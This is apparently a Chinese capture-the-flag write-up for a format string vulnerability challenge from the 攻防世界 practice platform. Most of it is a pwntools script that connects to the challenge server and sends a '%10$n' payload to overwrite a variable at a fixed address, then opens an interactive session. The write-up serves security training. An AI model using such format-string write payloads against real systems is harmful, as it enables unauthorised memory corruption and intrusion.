攻防世界|格式化字符漏洞|

--------------补充格式化漏洞

-------------补充结束

不断尝试确定偏移量（建议%X多写一点，方便判断，多写比少写好）

-----------------知识补充

-----------------补充结束

py代码如下：

点击查看代码

from pwn import *
# 设置日志级别为 'debug'（调试模式）
# 日志级别用于控制程序运行时输出日志的详细程度
# 'debug' 是较低的级别，会输出最详细的日志信息，包括：
# - 程序运行中的调试细节（如变量值、函数调用过程）
# - 普通的信息提示（info 级别内容）
# - 警告（warning）、错误（error）、严重错误（critical）等
# 通常在开发和调试阶段使用，便于排查问题
# 生产环境中一般会使用更高的级别（如 'info'、'warning'）以减少日志输出量
context.log_level = 'debug'

p = remote('61.147.171.35', 56015)
payload1 = b'Dragon_Roar'
payload2 = (p32(0x0804A068) +b'a'*4 + b'%10$n') #pwnme地址占4个字节，所以后面需要打印4个a
p.recvuntil(b'please tell me your name:\n')
p.sendline(payload1)
p.recvuntil(b'leave your message please:\n')
p.sendline(payload2)
p.interactive()